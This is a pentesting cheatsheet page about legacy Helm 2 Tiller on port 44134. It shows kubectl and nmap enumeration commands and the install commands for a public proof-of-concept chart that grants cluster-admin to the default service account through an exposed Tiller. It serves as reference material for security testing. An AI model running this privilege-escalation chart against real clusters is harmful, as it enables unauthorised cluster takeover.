daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

44134-pentesting-tiller-helm.md (4305B)


      1 ---
      2 title: "44134 Tiller / Helm"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/44134-pentesting-tiller-helm.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/44134-pentesting-tiller-helm.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 44134 Tiller / Helm
     14 
     15 ## Basic Information
     16 
     17 Helm is a **package manager** for Kubernetes, and its packages are called **charts**. This page concerns the historical Helm 2 architecture, in which the client talked to an in-cluster server named **Tiller** over TCP port 44134. Helm 3 removed Tiller, so finding this port normally indicates a legacy deployment.<sup>[[1]](#references)</sup>
     18 
     19 **Default port:** 44134
     20 
     21 ```text
     22 PORT      STATE SERVICE VERSION
     23 44134/tcp open  unknown
     24 ```
     25 
     26 ## Enumeration
     27 
     28 If you can **enumerate pods and/or services** of different namespaces enumerate them and search for the ones with **"tiller" in their name**:
     29 
     30 ```bash
     31 kubectl get pods | grep -i "tiller"
     32 kubectl get services | grep -i "tiller"
     33 kubectl get pods -n kube-system | grep -i "tiller"
     34 kubectl get services -n kube-system | grep -i "tiller"
     35 kubectl get pods -n <namespace> | grep -i "tiller"
     36 kubectl get services -n <namespace> | grep -i "tiller"
     37 ```
     38 
     39 Examples:
     40 
     41 ```bash
     42 kubectl get pods -n kube-system
     43 NAME                                       READY   STATUS             RESTARTS   AGE
     44 kube-scheduler-controlplane                1/1     Running            0          35m
     45 tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m
     46 
     47 kubectl get services -n kube-system
     48 NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
     49 kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
     50 tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m
     51 ```
     52 
     53 You could also try to find this service running checking the port 44134:
     54 
     55 ```bash
     56 sudo nmap -sS -p 44134 <IP>
     57 ```
     58 
     59 After discovering it, install a compatible Helm 2 client with a package manager such as Homebrew or download the matching binary from Helm's official releases. A Helm 3 client does not implement the same Tiller workflow.<sup>[[2]](#references)</sup><sup>[[5]](#references)</sup>
     60 
     61 Then, you can **enumerate the service**:
     62 
     63 ```text
     64 helm --host tiller-deploy.kube-system:44134 version
     65 ```
     66 
     67 ### Privilege Escalation
     68 
     69 Helm 2 commonly deployed Tiller in `kube-system`. The effective impact depends on Tiller's service account and whether TLS/authentication is configured; an exposed Tiller running with broad RBAC permissions can provide a path to cluster privilege escalation.<sup>[[3]](#references)</sup>
     70 
     71 One proof of concept installs a chart that creates a cluster-admin binding for the `default` service account. It succeeds only if Tiller itself is allowed to create those RBAC objects; it does not make every Tiller deployment automatically cluster-admin.<sup>[[4]](#references)</sup>
     72 
     73 ```text
     74 git clone https://github.com/Ruil1n/helm-tiller-pwn
     75 helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
     76 /pwnchart
     77 ```
     78 
     79 The chart's exact `clusterrole.yaml` and `clusterrolebinding.yaml` manifests grant broad permissions to the `default` service account. Inspect both files before using the proof of concept.<sup>[[3]](#references)</sup><sup>[[6]](#references)</sup><sup>[[7]](#references)</sup>
     80 
     81 ## References
     82 
     83 - [1] [Helm - Changes Since Helm 2](https://helm.sh/docs/faq/changes_since_helm2/)
     84 - [2] [Helm 2 documentation - Installing Helm](https://v2.helm.sh/docs/using_helm/#installing-helm)
     85 - [3] [Kubernetes中使用Helm2的安全风险 (Security Risks of Using Helm2 in Kubernetes)](http://rui0.cn/archives/1573)
     86 - [4] [`helm-tiller-pwn` proof of concept](https://github.com/Ruil1n/helm-tiller-pwn)
     87 - [5] [Official Helm releases](https://github.com/helm/helm/releases)
     88 - [6] [`helm-tiller-pwn` `clusterrole.yaml`](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml)
     89 - [7] [`helm-tiller-pwn` `clusterrolebinding.yaml`](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml)